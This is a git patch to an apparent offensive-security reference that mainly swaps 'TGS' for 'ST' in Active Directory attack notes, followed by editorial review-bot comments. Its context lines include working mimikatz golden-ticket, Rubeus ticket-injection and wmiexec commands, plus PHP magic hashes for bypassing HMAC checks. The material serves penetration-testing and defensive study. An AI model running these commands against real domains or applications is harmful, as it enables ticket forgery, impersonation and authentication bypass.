From 2be739ea4fc6aa9e2d3b4177b35eb4d16e4ebfb2 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Tue, 6 Sep 2022 10:03:49 +0200 Subject: [PATCH] Fixing TGS/ST --- .../Active Directory Attack.md | 20 +++++++++---------- .../Windows - Privilege Escalation.md | 6 +++--- Type Juggling/README.md | 20 +++++++++++-------- 3 files changed, 25 insertions(+), 21 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index f46dfd2..fab2467 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md 
@@ -721,7 +721,7 @@ Requirements: #### samAccountName spoofing -> During S4U2Self, the KDC will try to append a '\$' to the computer name specified in the TGT, if the computer name is not found. An attacker can create a new machine account with the sAMAccountName set to a domain controller's sAMAccountName - without the '\$'. For instance, suppose there is a domain controller with a sAMAccountName set to 'DC\$'. An attacker would then create a machine account with the sAMAccountName set to 'DC'. The attacker can then request a TGT for the newly created machine account. After the TGT has been issued by the KDC, the attacker can rename the newly created machine account to something different, e.g. JOHNS-PC. The attacker can then perform S4U2Self and request a TGS to itself as any user. Since the machine account with the sAMAccountName set to 'DC' has been renamed, the KDC will try to find the machine account by appending a '$', which will then match the domain controller. The KDC will then issue a valid TGS for the domain controller. +> During S4U2Self, the KDC will try to append a '\$' to the computer name specified in the TGT, if the computer name is not found. An attacker can create a new machine account with the sAMAccountName set to a domain controller's sAMAccountName - without the '\$'. For instance, suppose there is a domain controller with a sAMAccountName set to 'DC\$'. An attacker would then create a machine account with the sAMAccountName set to 'DC'. The attacker can then request a TGT for the newly created machine account. After the TGT has been issued by the KDC, the attacker can rename the newly created machine account to something different, e.g. JOHNS-PC. The attacker can then perform S4U2Self and request a ST to itself as any user. Since the machine account with the sAMAccountName set to 'DC' has been renamed, the KDC will try to find the machine account by appending a '$', which will then match the domain controller. 
The KDC will then issue a valid ST for the domain controller. **Requirements** @@ -1670,7 +1670,7 @@ Mitigations: ### Pass-the-Ticket Silver Tickets -Forging a TGS require machine account password (key) or NTLM hash of the service account. +Forging a Service Ticket (ST) require machine account password (key) or NT hash of the service account. ```powershell # Create a ticket for the service @@ -1707,7 +1707,7 @@ Mitigations: > "A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. " - [MSDN](https://docs.microsoft.com/fr-fr/windows/desktop/AD/service-principal-names) -Any valid domain user can request a kerberos ticket (TGS) for any domain service. Once the ticket is received, password cracking can be done offline on the ticket to attempt to break the password for whatever user the service is running as. +Any valid domain user can request a kerberos ticket (ST) for any domain service. Once the ticket is received, password cracking can be done offline on the ticket to attempt to break the password for whatever user the service is running as. * [GetUserSPNs](https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetUserSPNs.py) from Impacket Suite 
@@ -2650,10 +2650,10 @@ Using the **UnPAC The Hash** method, you can retrieve the NT Hash for an User vi # Get a TGT using the newly acquired certificate via PKINIT proxychains python3 gettgtpkinit.py ez.lab/ws2\$ ws2.ccache -cert-pfx /opt/impacket/examples/T12uyM5x.pfx -pfx-pass 5j6fNfnsU7BkTWQOJhpR - # Get a TGS for the target account + # Get a ST (service ticket) for the target account proxychains python3 gets4uticket.py kerberos+ccache://ez.lab\\ws2\$:ws2.ccache@dc1.ez.lab cifs/ws2.ez.lab@ez.lab administrator@ez.lab administrator_tgs.ccache -v - # Utilize the TGS for future activity + # Utilize the ST for future activity export KRB5CCNAME=/opt/pkinittools/administrator_ws2.ccache proxychains python3 wmiexec.py -k -no-pass ez.lab/administrator@ws2.ez.lab ``` @@ -2751,7 +2751,7 @@ ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtr * using bloodyAD: `bloodyAD.py --host [DC IP] -d DOMAIN -u hacker -p MyPassword123 addObjectToGroup UserToAdd 'GROUP NAME'` -* **GenericAll/GenericWrite** : We can set a **SPN** on a target account, request a TGS, then grab its hash and kerberoast it. +* **GenericAll/GenericWrite** : We can set a **SPN** on a target account, request a Service Ticket (ST), then grab its hash and kerberoast it. ```powershell # Check for interesting permissions on accounts: Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"} 
@@ -3117,14 +3117,14 @@ mimikatz(commandline) # kerberos::golden /domain:domain.local /sid:S-1-5-21... / mimikatz(commandline) # kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:e4e47c8fc433c9e0f3b17ea74856ca6b /user:Administrator /service:krbtgt /target:moneycorp.local /ticket:c:\ad\tools\mcorp-ticket.kirbi ``` -#### Use the Trust Ticket file to get a TGS for the targeted service +#### Use the Trust Ticket file to get a ST for the targeted service ```powershell .\asktgs.exe c:\temp\trust.kirbi CIFS/machine.domain.local .\Rubeus.exe asktgs /ticket:c:\ad\tools\mcorp-ticket.kirbi /service:LDAP/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt ``` -Inject the TGS file and access the targeted service with the spoofed rights. +Inject the ST file and access the targeted service with the spoofed rights. ```powershell kirbikator lsa .\ticket.kirbi @@ -3161,7 +3161,7 @@ If we compromise the bastion we get `Domain Admins` privileges on the other doma ### Kerberos Unconstrained Delegation -> The user sends a TGS to access the service, along with their TGT, and then the service can use the user's TGT to request a TGS for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html +> The user sends a ST to access the service, along with their TGT, and then the service can use the user's TGT to request a ST for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html > When a user authenticates to a computer that has unrestricted kerberos delegation privilege turned on, authenticated user's TGT ticket gets saved to that computer's memory. 
@@ -3318,7 +3318,7 @@ PS> ls \\dc01.offense.local\c$ Resource-based Constrained Delegation was introduced in Windows Server 2012. -> The user sends a TGS to access the service ("Service A"), and if the service is allowed to delegate to another pre-defined service ("Service B"), then Service A can present to the authentication service the TGS that the user provided and obtain a TGS for the user to Service B. https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html +> The user sends a Service Ticket (ST) to access the service ("Service A"), and if the service is allowed to delegate to another pre-defined service ("Service B"), then Service A can present to the authentication service the TGS that the user provided and obtain a ST for the user to Service B. https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html 1. Import **Powermad** and **Powerview** diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 70e1c81..35cc70a 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -956,9 +956,8 @@ Example: "Windows Help and Support" (Windows + F1), search for "command prompt", Look for vuln drivers loaded, we often don't spend enough time looking at this: ```powershell -# https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery - -PS C:\Users\Swissky> driverquery.exe /fo table +# Native binary +PS C:\Users\Swissky> driverquery.exe /fo table /si Module Name Display Name Driver Type Link Date ============ ====================== ============= ====================== 1394ohci 1394 OHCI Compliant Ho Kernel 12/10/2006 4:44:38 PM 
@@ -972,6 +971,7 @@ acpitime ACPI Wake Alarm Driver Kernel 2/9/1974 7:10:30 AM ADP80XX ADP80XX Kernel 4/9/2015 4:49:48 PM +# https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery PS C:\Users\Swissky> DriverQuery.exe --no-msft [+] Enumerating driver services... [+] Checking file signatures... diff --git a/Type Juggling/README.md b/Type Juggling/README.md index 41bdb4c..37ebd0a 100644 --- a/Type Juggling/README.md +++ b/Type Juggling/README.md @@ -52,22 +52,22 @@ function validate_cookie($cookie,$key){ ... ``` -The $cookie variable is provided by the user. The $key variable is a secret and unknown to the user. +The `$cookie` variable is provided by the user. The $key variable is a secret and unknown to the user. -If we can make the calculated hash string Zero-like, and provide "0" in the $cookie['hmac'], the check will pass. +If we can make the calculated hash string Zero-like, and provide "0" in the `$cookie['hmac']`, the check will pass. -``` +```ps1 "0e768261251903820937390661668547" == "0" ``` We have control over 3 elements in the cookie: -- $username - username you are targeting, probably "admin" -- $hmac - the provided hash, "0" -- $expiration - a UNIX timestamp, must be in the future +- `$username` - username you are targeting, probably "admin" +- `$hmac` - the provided hash, "0" +- `$expiration` - a UNIX timestamp, must be in the future Increase the expiration timestamp enough times and we will eventually get a Zero-like calculated HMAC. -``` +```ps1 hash_hmac(admin|1424869663) -> "e716865d1953e310498068ee39922f49" hash_hmac(admin|1424869664) -> "8c9a492d316efb5e358ceefe3829bde4" hash_hmac(admin|1424869665) -> "9f7cdbe744fc2dae1202431c7c66334b" 
@@ -80,8 +80,10 @@ hash_hmac(admin|1835970773) -> "0e174892301580325162390102935332" // "0e17489230 If the hash computed starts with "0e" (or "0..0e") only followed by numbers, PHP will treat the hash as a float. -| Hash | “Magic” Number / String | Magic Hash | Found By / Description | +| Hash | "Magic" Number / String | Magic Hash | Found By / Description | | ---- | -------------------------- |:---------------------------------------------:| -------------:| +| MD4 | gH0nAdHk | 0e096229559581069251163783434175 | [@spaze](https://github.com/spaze/hashes/blob/master/md4.md) | +| MD4 | IiF+hTai | 00e90130237707355082822449868597 | [@spaze](https://github.com/spaze/hashes/blob/master/md4.md) | | MD5 | 240610708 | 0e462097431906509019562988736854 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | | MD5 | QNKCDZO | 0e830400451993494058024219903391 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | | MD5 | 0e1137126905 | 0e291659922323405260514745084877 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) | @@ -106,3 +108,5 @@ var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m')); * [Writing Exploits For Exotic Bug Classes: PHP Type Juggling By Tyler Borland](http://turbochaos.blogspot.com/2013/08/exploiting-exotic-bugs-php-type-juggling.html) * [Magic Hashes - WhiteHatSec](https://www.whitehatsec.com/blog/magic-hashes/) * [PHP Magic Tricks: Type Juggling](https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf) +* [spaze/hashes - Magic hashes – PHP hash "collisions"](https://github.com/spaze/hashes) +* [(Super) Magic Hashes - Mon 07 October 2019 - myst404 (@myst404_)](https://offsec.almond.consulting/super-magic-hash.html) \ No newline at end of file
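Review bot: In the `#### samAccountName spoofing` hunk of `Active Directory Attack.md`, the edited line sits inside a `>` blockquote that presents someone else's text, so changing "TGS" to "ST" there alters a quotation rather than the repo's own wording. Suggest keeping the quoted passage verbatim and putting the terminology fix outside the quote, or dropping the `>` so the paragraph reads as the repo's own paraphrase. Two smaller points on the same line: "request a ST" should be "request an ST" (the abbreviation is read letter by letter, so it takes "an"), and the `'$'` in "by appending a '$', which will then match" is left unescaped while every other dollar sign in the line is written `'\$'`.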
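Review bot: Subject/verb mismatch in the Silver Tickets hunk: "Forging a Service Ticket (ST) require machine account password (key) or NT hash of the service account." was already wrong before this change and is being rewritten anyway, so make it "Forging a Service Ticket (ST) requires the machine account password (key) or the NT hash of the service account."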
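Review bot: In the UnPAC The Hash hunk the two renamed comments are fine, but the commands around them disagree on the ccache file name: `gets4uticket.py ... administrator_tgs.ccache -v` writes one file, while the next step runs `export KRB5CCNAME=/opt/pkinittools/administrator_ws2.ccache`, so the snippet does not work when copied as-is. Since this commit is already renaming TGS to ST, use one name in both places (for example `administrator_ws2.ccache`). Also "# Get a ST (service ticket)" should read "# Get an ST (service ticket)".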
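Review bot: The `GenericAll/GenericWrite` hunk keeps the context line `Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"}`; `IdentinyReferenceName` is a misspelling of `IdentityReferenceName`, and the filter silently matches nothing as written. Worth fixing while this block is being touched.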
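Review bot: Article in the Trust Ticket hunk: the heading "#### Use the Trust Ticket file to get a ST for the targeted service" should be "to get an ST for the targeted service"; the following "Inject the ST file and access the targeted service with the spoofed rights." reads fine.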
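Review bot: Same quotation concern in the `### Kerberos Unconstrained Delegation` hunk: the rewritten line is a `>` blockquote attributed to https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html, so replacing "TGS" with "ST" inside it misquotes the source. Either keep the quote verbatim or remove the attribution and quote marker and state it as the repo's own summary. If the edit stays, "sends a ST" and "request a ST" both need "an ST".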
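Review bot: The Resource-based Constrained Delegation hunk is only half converted: the new line reads "The user sends a Service Ticket (ST) to access the service ... then Service A can present to the authentication service the TGS that the user provided and obtain a ST for the user to Service B", so one "TGS" survives in the middle of the sentence while the two ends say "ST". Convert the middle occurrence as well, or, since this is again a `>` quotation of the Wagging the Dog post, leave the whole sentence verbatim. "obtain a ST" should also be "obtain an ST".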
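Review bot: In `Windows - Privilege Escalation.md`, adding `/si` to `driverquery.exe /fo table /si` makes the command disagree with the sample output kept directly below it. `/si` switches driverquery to signed-driver information (DeviceName, INF name, IsSigned, Manufacturer), whereas the unchanged context lines still show the default table with `Module Name`, `Display Name`, `Driver Type` and `Link Date` (`1394ohci`, `acpitime`, `ADP80XX`, ...). Either keep `driverquery.exe /fo table` to match the output, or show `/si` as a second command with its own output, since the signed/unsigned column is the part that matters for spotting vulnerable drivers.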
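Review bot: In the `Type Juggling/README.md` hunk at line 52 the new inline-code formatting is applied inconsistently: `$cookie` and `$cookie['hmac']` are wrapped in backticks, but `$key` in the same sentence ("The $key variable is a secret and unknown to the user.") is not. Separately, the two fences are retagged from untagged to `ps1`, yet their contents are a PHP loose comparison (`"0e768261251903820937390661668547" == "0"`) and `hash_hmac(...)` pseudo-output, not PowerShell; tag them `php` (or leave them untagged as before) so the highlighting does not mislead readers about which language the juggling applies to.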
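Review bot: The last hunk leaves `Type Juggling/README.md` without a trailing newline (`\ No newline at end of file` after the new `(Super) Magic Hashes` entry); add a final newline so the next append to the reference list does not produce a spurious one-line diff. The two new reference entries themselves look correctly formatted and match the list style above them.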